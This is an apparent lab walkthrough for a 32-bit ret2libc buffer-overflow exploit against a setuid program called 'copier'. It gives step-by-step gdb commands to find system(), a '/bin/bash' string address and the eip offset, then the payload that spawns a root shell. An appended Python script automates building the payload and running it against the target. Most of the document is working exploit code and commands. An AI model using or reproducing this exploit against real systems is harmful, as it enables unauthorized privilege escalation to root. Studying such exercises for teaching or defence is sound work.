EXPLOIT DEVELOPMENT
- Please open a shell to begin the steps that follow:
- 1. Open copier in gdb: "gdb ./copier"
- 2. Set a breakpoint on main with "break main"
- 3. Run the program with a "r"
- 4. Find SHELL=/bin/bash among the environment variables by printing them one at a time with "x/s *((char **)environ+1)", increasing the number after the + by one each time until the string appears.
- 5. Add 6 (the length of "SHELL=") to the address printed on the left of the line "0xFFFFFFFF: "SHELL=/bin/bash"" to get the address of the "/bin/bash" string itself. Check your math by reading that address with "x/s 0xFFFFFFFF"; it should print exactly "/bin/bash".
- 6. Get the address of system(): "p system"
- 7. Let's validate that we control eip by checking whether our marker "ABAB" ends up in eip when the program segfaults; gdb should report "0x42414241 in ?? ()" (the bytes appear reversed because x86 is little-endian). Type: "r $(python -c 'print "\x90"*112 + "ABAB"')"
- 8. If the prior step does not give that result, adjust the number after the "*" up or down. If eip contains "\x90" bytes (0x90909090), the NOP padding reached the saved return address, so the padding is too long: adjust downwards. If eip contains anything else that is not "0x42414241", the marker fell short of the saved return address: adjust upwards. Repeat until eip is exactly 0x42414241.
- 9. Now we have the 3 pieces of information we need: the address of system(), the address of the "/bin/bash" string, and the exact offset to control eip.
- 10. Type "r $(python -c 'print "A"*112+"SYSTEMADDRESSGOESHEREBACKWARDS"+"BBBB"+"STRINGOFBASHGOESHEREBACKWARDS"')". Each address is written backwards (least significant byte first) because x86 is little-endian. The "BBBB" is the return address system() will use once the shell exits; it only needs to be there so the "/bin/bash" pointer lands where system() expects its argument. If, for example, system was at 0xF7E44940 and the "/bin/bash" string at 0xFFFFd8a1, your exploit would be "r $(python -c 'print "A"*112+"\x40\x49\xe4\xf7"+"BBBB"+"\xa1\xd8\xff\xff"')"
- 11. If you drop into a non-root shell, it is because gdb does not run the program with its setuid privileges. Quit gdb and run the exploit directly: "./copier $(python -c 'print "A"*112+"\x40\x49\xe4\xf7"+"BBBB"+"\xca\xd3\xff\xff"')". Note that the "/bin/bash" address is different here: outside gdb the environment, and therefore the stack layout, is not the same, so the string moves. If the shell does not appear, recompute the string address for the environment the program actually runs in.
- 12. You are now root. Confirm it with "id", then check the running environment as root with "ps -aex --forest".
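The whole procedure above, packed into one script. This is an added example, not part of the original lab: it assumes the page's own numbers (a 32-bit target, a 112-byte offset to the saved return address, system at 0xF7E44940 and the "/bin/bash" string at 0xFFFFD8A1), and the "copier" target name is taken from the lab. It builds the step 7 probe, turns the eip value gdb reports into the next padding to try (step 8, including the off-by-one-to-three cases the text only hints at), derives the "/bin/bash" address from the SHELL= string (step 5), and assembles the final ret2libc payload (step 10).

```python
#!/usr/bin/env python3
"""Build and sanity-check the ret2libc payload from the steps above.

Added example; not from the original lab. Assumes the numbers the page uses:
a 32-bit target, a 112-byte offset to the saved return address, and the example
addresses 0xF7E44940 (system) and 0xFFFFD8A1 (the "/bin/bash" string).
"""
import os
import struct
import sys

OFFSET = 112                  # padding bytes before the saved EIP (steps 7 and 8)
SYSTEM_ADDR = 0xF7E44940      # from "p system" in gdb (example value)
BINBASH_ADDR = 0xFFFFD8A1     # address of "SHELL=/bin/bash" + 6 (example value)
MARKER = b"ABAB"              # shows up in EIP as 0x42414241 when the offset is right


def binbash_addr(shell_var_addr):
    """Step 5: skip the 'SHELL=' prefix to get the address of '/bin/bash'."""
    return shell_var_addr + len("SHELL=")


def p32(value):
    """Pack a 32-bit address little-endian, i.e. 'backwards' as the page puts it."""
    return struct.pack("<I", value)


def control_probe(padding):
    """Step 7: NOP padding followed by the ABAB marker."""
    return b"\x90" * padding + MARKER


def next_padding(crash_eip, padding):
    """Step 8: turn the EIP value gdb reports into the next padding length to try."""
    window = p32(crash_eip)           # the 4 bytes that overwrote saved EIP, in memory order
    if window == MARKER:
        return padding                # marker landed exactly on saved EIP: offset found
    nops = len(window) - len(window.lstrip(b"\x90"))
    if nops:
        return padding - nops         # NOPs reached the slot: padding too long by that many
    for short in (1, 2, 3):
        if window.startswith(MARKER[short:]):
            return padding + short    # only the tail of the marker reached the slot
    return padding + 4                # nothing from the probe reached the slot: at least 4 short


def build_payload(offset=OFFSET, system_addr=SYSTEM_ADDR, string_addr=BINBASH_ADDR):
    """Step 10: padding | system() | fake return address | pointer to '/bin/bash'.

    When the overwritten return address is popped, execution enters system();
    system() then sees BBBB as its own return address and the next dword as
    its argument, exactly as if it had been called normally.
    """
    return b"A" * offset + p32(system_addr) + b"BBBB" + p32(string_addr)


def has_no_nul(payload):
    """A NUL byte would end a strcpy-style copy early and cannot be passed in argv at all."""
    return b"\x00" not in payload


if __name__ == "__main__":
    payload = build_payload()
    if not has_no_nul(payload):
        sys.exit("payload contains a NUL byte; pick an address without one")
    if len(sys.argv) > 1:
        # Run the target outside gdb, e.g.:  python3 exploit.py ./copier
        target = sys.argv[1].encode()
        os.execv(target, [target, payload])
    # Otherwise emit the raw bytes for use as:  ./copier "$(python3 exploit.py)"
    sys.stdout.buffer.write(payload)
```

The page's one-liners use Python 2 "print" with str; this script is Python 3 and works in bytes so no encoding step can silently alter the address bytes. Remember that the "/bin/bash" address you measured inside gdb (step 5) will usually not match the one outside gdb, so recompute it with binbash_addr() from a SHELL= address taken in the real environment before running the script against the setuid binary.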